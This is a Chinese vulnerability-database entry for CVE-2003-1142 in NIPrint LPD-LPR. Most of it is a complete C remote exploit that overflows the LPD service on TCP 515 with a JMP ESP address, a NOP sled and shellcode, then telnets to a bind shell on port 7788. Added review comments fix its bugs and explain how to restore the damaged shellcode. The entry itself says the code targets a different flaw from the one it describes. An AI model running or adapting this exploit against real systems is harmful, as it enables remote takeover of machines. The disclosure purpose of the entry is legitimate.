Network Instruments NIPrint LDP-LPR权限提升漏洞

Network Instruments NIPrint LDP-LPR权限提升漏洞

漏洞ID 1107576 漏洞类型 访问验证错误
发布时间 2003-11-04 更新时间 2005-10-20
CVE编号 CVE-2003-1142
CNNVD-ID CNNVD-200311-013
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/116
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200311-013
|漏洞详情
NIPrint是一款32位的Winsock LPD/LPR打印服务程序。NIPrint默认以SYSTEM权限作为服务运行,任何本地用户都可以通过任务栏图标访问它;问题在于NIPrint所使用的帮助系统会以SYSTEM权限调用Explorer,却没有对调用者做正确的权限限制,因此本地攻击者可以借助这个以SYSTEM权限运行的Explorer执行任意命令,从而获得管理员权限。需要注意的是,下面“漏洞EXP”中给出的代码并不针对这个本地帮助API问题:它是针对NIPrint LPD服务(TCP 515端口)的远程栈溢出利用程序(向515端口发送超长数据覆盖返回地址并跳转到shellcode,随后通过telnet连接目标的7788端口),二者是不同的缺陷,不应混为一谈。
|漏洞EXP
/*
	remote exploit for NIPrint LPD-LPR Print Server (Version <= 4.10)

	by xCrZx /BLack Sand Project/ /04.11.03/

	bug found by KF
	successfully tested on Win XP 5.1.2600
	P.S.#1 coded just for fun...
	P.S.#2 this exploit can be compiled under Win32 and *nix

	NOTE (review): this is a remote stack overflow against the LPD
	service on TCP 515 (return address overwritten with a JMP ESP,
	NOP sled, shellcode), which is a different issue from the local
	Help-API privilege escalation described in the entry above.
*/


#ifdef _WIN32

 #include <winsock.h>
 #include <windows.h>

#else

 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/stat.h>
 #include <netinet/in.h>
 #include <arpa/inet.h>   /* inet_addr(), htons(); previously implicitly declared */
 #include <netdb.h>
 #include <fcntl.h>
 #include <unistd.h>
 #include <errno.h>

#endif

#include <stdio.h>
#include <stdlib.h>      /* exit(), system() */
#include <string.h>      /* memset(), memcpy(), strlen() */

// JMP ESP ADDRESS (in Win XP 5.1.2600)
// Hard-coded for that one build only: the location of a JMP ESP gadget
// changes between Windows versions and service packs, so this value has to
// be replaced for any other target. NOTE(review): nothing in the exploit
// detects a wrong address - the service will most likely just crash.
#define RET 0x77F5801c
// TCP port on the target that main() telnets to after the payload is sent
// (see the final system("telnet ...") call), so the shellcode is presumably
// a bind shell listening on this port.
#define SHELL 7788

/*
 * Payload appended after the NOP sled in main().
 *
 * NOTE(review): as reproduced on this page every "\x" escape has lost its
 * backslash ("x90xebx03..." was originally "\x90\xeb\x03..."), so this
 * literal is plain ASCII text, roughly three times the intended length,
 * and NOT the original byte string; it will not execute as printed. The
 * same extraction damage stripped the "\n" from the printf() strings in
 * main(). Restore the escapes from the original exploit-db listing before
 * building. No "\x00" appears anywhere in the listing, which is why the
 * original sized the payload with strlen(). main() telnets to port SHELL
 * on the target afterwards, so the payload is presumably a bind shell.
 */
char shellcode[] =

        "x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90"
        "x90x8bxc5x33xc9x66xb9x10x03x50x80x30x97x40xe2xfa"
        "x7ex8ex95x97x97xcdx1cx4dx14x7cx90xfdx68xc4xf3x36"
        "x97x97x97x97xc7xf3x1exb2x97x97x97x97xa4x4cx2cx97"
        "x97x77xe0x7fx4bx96x97x97x16x6cx97x97x68x28x98x14"
        "x59x96x97x97x16x54x97x97x96x97xf1x16xacxdaxcdxe2"
        "x70xa4x57x1cxd4xabx94x54xf1x16xafxc7xd2xe2x4ex14"
        "x57xefx1cxa7x94x64x1cxd9x9bx94x5cx16xaexdcxd2xc5"
        "xd9xe2x52x16xeex93xd2xdbxa4xa5xe2x2bxa4x68x1cxd1"
        "xb7x94x54x1cx5cx94x9fx16xaexd0xf2xe3xc7xe2x9ex16"
        "xeex93xe5xf8xf4xd6xe3x91xd0x14x57x93x7cx72x94x68"
        "x94x6cx1cxc1xb3x94x6dxa4x45xf1x1cx80x1cx6dx1cxd1"
        "x87xdfx94x6fxa4x5ex1cx58x94x5ex94x5ex94xd9x8bx94"
        "x5cx1cxaex94x6cx7exfex96x97x97xc9x10x60x1cx40xa4"
        "x57x60x47x1cx5fx65x38x1exa5x1axd5x9fxc5xc7xc4x68"
        "x85xcdx1exd5x93x1axe5x82xc5xc1x68xc5x93xcdxa4x57"
        "x3bx13x57xe2x6exa4x5ex1dx99x13x5exe3x9exc5xc1xc4"
        "x68x85xcdx3cx75x7fxd1xc5xc1x68xc5x93xcdx1cx4fxa4"
        "x57x3bx13x57xe2x6exa4x5ex1dx99x17x6ex95xe3x9exc5"
        "xc1xc4x68x85xcdx3cx75x70xa4x57xc7xd7xc7xd7xc7x68"
        "xc0x7fx04xfdx87xc1xc4x68xc0x7bxfdx95xc4x68xc0x67"
        "xa4x57xc0xc7x27x9bx3cxcfx3cxd7x3cxc8xdfxc7xc0xc1"
        "x3axc1x68xc0x57xdfxc7xc0x3axc1x3axc1x68xc0x57xdf"
        "x27xd3x1ex90xc0x68xc0x53xa4x57x1cxd1x63x1exd0xab"
        "x1exd0xd7x1cx91x1exd0xafxa4x57xf1x2fx96x96x1exd0"
        "xbbxc0xc0xa4x57xc7xc7xc7xd7xc7xdfxc7xc7x3axc1xa4"
        "x57xc7x68xc0x5fx68xe1x67x68xc0x5bx68xe1x6bx68xc0"
        "x5bxdfxc7xc7xc4x68xc0x63x1cx4fxa4x57x23x93xc7x56"
        "x7fx93xc7x68xc0x43x1cx67xa4x57x1cx5fx22x93xc7xc7"
        "xc0xc6xc1x68xe0x3fx68xc0x47x14xa8x96xebxb5xa4x57"
        "xc7xc0x68xa0xc1x68xe0x3fx68xc0x4bx9cx57xe3xb8xa4"
        "x57xc7x68xa0xc1xc4x68xc0x6fxfdxc7x68xc0x77x7cx5f"
        "xa4x57xc7x23x93xc7xc1xc4x68xc0x6bxc0xa4x5exc6xc7"
        "xc1x68xe0x3bx68xc0x4fxfdxc7x68xc0x77x7cx3dxc7x68"
        "xc0x73x7cx69xcfxc7x1exd5x65x54x1cxd3xb3x9bx92x2f"
        "x97x97x97x50x97xefxc1xa3x85xa4x57x54x7cx7bx7fx75"
        "x6ax68x68x7fx05x69x68x68xdcxc1x70xe0xb4x17x70xe0"
        "xdbxf8xf6xf3xdbxfexf5xe5xf6xe5xeexd6x97xdcxd2xc5"
        "xd9xd2xdbxa4xa5x97xd4xe5xf2xf6xe3xf2xc7xfexe7xf2"
        "x97xd0xf2xe3xc4xe3xf6xe5xe3xe2xe7xdexf9xf1xf8xd6"
        "x97xd4xe5xf2xf6xe3xf2xc7xe5xf8xf4xf2xe4xe4xd6x97"
        "xd4xfbxf8xe4xf2xdfxf6xf9xf3xfbxf2x97xc7xf2xf2xfc"
        "xd9xf6xfaxf2xf3xc7xfexe7xf2x97xd0xfbxf8xf5xf6xfb"
        "xd6xfbxfbxf8xf4x97xc0xe5xfexe3xf2xd1xfexfbxf2x97"
        "xc5xf2xf6xf3xd1xfexfbxf2x97xc4xfbxf2xf2xe7x97xd2"
        "xefxfexe3xc7xe5xf8xf4xf2xe4xe4x97x97xc0xc4xd8xd4"
        "xdcxa4xa5x97xe4xf8xf4xfcxf2xe3x97xf5xfexf9xf3x97"
        "xfbxfexe4xe3xf2xf9x97xf6xf4xf4xf2xe7xe3x97xe4xf2"
        "xf9xf3x97xe5xf2xf4xe1x97x95x97x89xfbx97x97x97x97"
        "x97x97x97x97x97x97x97x97xf4xfaxf3xb9xf2xefxf2x97"
        "x68x68x68x68";


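/*
 * Resolve a dotted quad or host name to an IPv4 address in network byte
 * order. The value is always a 32-bit address; it is returned widened to
 * long only because that is what the existing caller expects.
 *
 * hostname: NUL-terminated dotted quad ("1.2.3.4") or DNS name.
 * Returns the address on success. On failure it prints a diagnostic and
 * exits the process - the original contract; main() stores the result
 * straight into sin_addr and never checks it.
 *
 * Bug fixed: the original tested `(ipaddr = inet_addr(hostname)) < 0`.
 * inet_addr() returns the unsigned in_addr_t and signals failure with
 * INADDR_NONE (0xffffffff). Widened to a 64-bit long that value is never
 * negative, so on LP64 hosts a non-numeric name was silently used as
 * 255.255.255.255 instead of being resolved; on ILP32 hosts any numeric
 * address whose last octet is >= 128 compared negative and was needlessly
 * re-resolved through gethostbyname(). The result is now compared against
 * INADDR_NONE explicitly. Inherited limitation of inet_addr(): the literal
 * "255.255.255.255" is indistinguishable from failure and falls through to
 * the name lookup.
 */
long getip(char *hostname) {
	struct hostent *he;
	struct in_addr ia;

	if (hostname == NULL || *hostname == '\0') {
		fprintf(stderr, "getip(): empty host name\n");
		exit(-1);
	}

	/* Numeric dotted quad first. */
	ia.s_addr = inet_addr(hostname);
	if (ia.s_addr != INADDR_NONE) {
		return (long)ia.s_addr;
	}

	/* Not numeric: resolve by name. gethostbyname() reports failures
	 * through h_errno rather than errno, so the original perror() printed
	 * an unrelated message; print our own instead. */
	he = gethostbyname(hostname);
	if (he == NULL || he->h_addrtype != AF_INET ||
	    he->h_length != (int)sizeof ia || he->h_addr_list[0] == NULL) {
		fprintf(stderr, "gethostbyname(%s): no IPv4 address found\n", hostname);
		exit(-1);
	}
	memcpy(&ia, he->h_addr_list[0], sizeof ia);
	return (long)ia.s_addr;
}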

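/*
 * Close a socket with the platform's own call; the exploit builds against
 * both Winsock and BSD sockets.
 */
static void close_sock(int s) {
#ifdef _WIN32
	closesocket(s);
#else
	close(s);
#endif
}

/*
 * Accept only characters that can appear in a dotted quad or a DNS host
 * name. argv[1] is later interpolated into a command line for system(),
 * so anything else (space, ';', '`', '$', ...) is rejected up front.
 */
static int is_host_char(char c) {
	return (c >= '0' && c <= '9') ||
	       (c >= 'a' && c <= 'z') ||
	       (c >= 'A' && c <= 'Z') ||
	       c == '.' || c == '-';
}

/*
 * Entry point. argv[1]: target host (dotted quad or name).
 *
 * Flow: connect to TCP 515 on the target, send one buffer laid out as
 *   49 x 'A' | RET (4 bytes, little-endian) | 50 x NOP | shellcode
 * then run `telnet <target> SHELL` - the shellcode is presumably a bind
 * shell on that port. The closing "[-] Not connected!" line is printed
 * whenever telnet returns, exactly as in the original, so it is a hint,
 * not a verdict.
 *
 * Returns 0 after the telnet step; exits non-zero on usage, address,
 * socket, connect or send failure.
 *
 * Fixes over the original:
 *  - "\n" escapes restored in every message (lost in extraction);
 *  - socket(), connect() and send() results are checked - the original
 *    ran the telnet step even when connect() had failed and never
 *    reported the failure;
 *  - RET is written as four explicit little-endian bytes instead of
 *    *(long *)&tmp[...]: that store is unaligned, violates strict
 *    aliasing, is 8 bytes wide on LP64 hosts and depends on host byte
 *    order (the target is x86);
 *  - the payload length is computed from the layout rather than with
 *    strlen(), which would truncate at any NUL byte in RET or the
 *    shellcode;
 *  - the telnet command line is built with snprintf() into the bounded
 *    buffer and argv[1] is restricted to host-name characters before it
 *    reaches system().
 */
int main(int argc, char **argv) {
#ifdef _WIN32
	WSADATA wsaData;
#endif
	int sock;
	struct sockaddr_in sockstruct;
	char tmp[2000];
	const size_t pad_len = 49;                    /* bytes up to the saved return address */
	const size_t nop_len = 50;                    /* NOP sled between RET and the shellcode */
	const size_t sc_len = sizeof shellcode - 1;   /* drop the literal's terminating NUL */
	size_t off;
	size_t i;
	int n;

	if (argc < 2 || argv[1][0] == '\0') {
		printf("Usage: %s <address>\n", argv[0]);
		exit(0);
	}
	for (i = 0; argv[1][i] != '\0'; i++) {
		if (!is_host_char(argv[1][i])) {
			printf("[-] Address may only contain letters, digits, '.' and '-'\n");
			exit(1);
		}
	}

	/* Assemble the payload before touching the network, so a layout
	 * problem never leaves a half-open connection behind. */
	if (pad_len + 4 + nop_len + sc_len > sizeof tmp) {
		printf("[-] Payload does not fit the %lu-byte send buffer\n",
		       (unsigned long)sizeof tmp);
		exit(1);
	}
	memset(tmp, 0x00, sizeof tmp);
	memset(tmp, 0x41, pad_len);
	off = pad_len;
	/* x86 target: RET goes out least-significant byte first. */
	tmp[off++] = (char)(RET & 0xff);
	tmp[off++] = (char)((RET >> 8) & 0xff);
	tmp[off++] = (char)((RET >> 16) & 0xff);
	tmp[off++] = (char)((RET >> 24) & 0xff);
	memset(tmp + off, 0x90, nop_len);
	off += nop_len;
	memcpy(tmp + off, shellcode, sc_len);
	off += sc_len;

#ifdef _WIN32
	if (WSAStartup(0x101, &wsaData)) {
		printf("Unable to initialize WinSock lib.\n");
		exit(1);
	}
#endif

	memset(&sockstruct, 0x00, sizeof sockstruct);
	sockstruct.sin_family = AF_INET;
	sockstruct.sin_addr.s_addr = getip(argv[1]);   /* getip() exits on failure */
	sockstruct.sin_port = htons(515);

	sock = socket(PF_INET, SOCK_STREAM, 0);
	if (sock < 0) {
		perror("socket()");
		exit(1);
	}
	if (connect(sock, (struct sockaddr *)&sockstruct, sizeof sockstruct) < 0) {
		perror("connect()");
		printf("[-] Could not connect to %s:515\n", argv[1]);
		close_sock(sock);
		exit(1);
	}
	printf("[+] Connected to %s:515!\n", argv[1]);

	/* A short send would deliver a truncated payload; treat it as failure. */
	if (send(sock, tmp, (int)off, 0) != (int)off) {
		perror("send()");
		close_sock(sock);
		exit(1);
	}
	printf("[+] Exploit code was sent!\n");
	close_sock(sock);
#ifdef _WIN32
	WSACleanup();
#endif

	printf("[+] Connecting to %s:%d\n", argv[1], SHELL);
	n = snprintf(tmp, sizeof tmp, "telnet %s %d", argv[1], SHELL);
	if (n < 0 || (size_t)n >= sizeof tmp) {
		printf("[-] Address too long for the telnet command\n");
		exit(1);
	}
	/* system() kept from the original for Win32/*nix portability; the
	 * command is bounded and argv[1] was validated above. */
	system(tmp);
	printf("[-] Not connected! NIPrint probably not vulnerable!\n");

	return 0;
}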

// milw0rm.com [2003-11-04]
|参考资料

来源:XF
名称:niprint-helpapi-gain-privileges(13592)
链接:http://xforce.iss.net/xforce/xfdb/13592
来源:BID
名称:8969
链接:http://www.securityfocus.com/bid/8969
来源:BUGTRAQ
名称:20031104SRT2003-11-02-0218-NIPrintLPD-LPRLocalHelpAPISYSTEMexploit
链接:http://www.securityfocus.com/archive/1/343258
